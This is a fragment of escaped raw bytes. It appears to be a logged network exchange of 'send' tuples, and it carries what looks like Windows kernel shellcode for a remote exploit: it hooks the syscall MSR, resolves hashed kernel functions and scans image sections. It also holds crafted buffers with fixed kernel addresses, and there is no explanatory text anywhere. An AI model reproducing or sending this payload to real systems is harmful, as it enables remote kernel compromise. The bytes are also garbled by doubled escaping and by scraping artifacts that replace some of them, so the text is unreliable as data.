H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 6, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\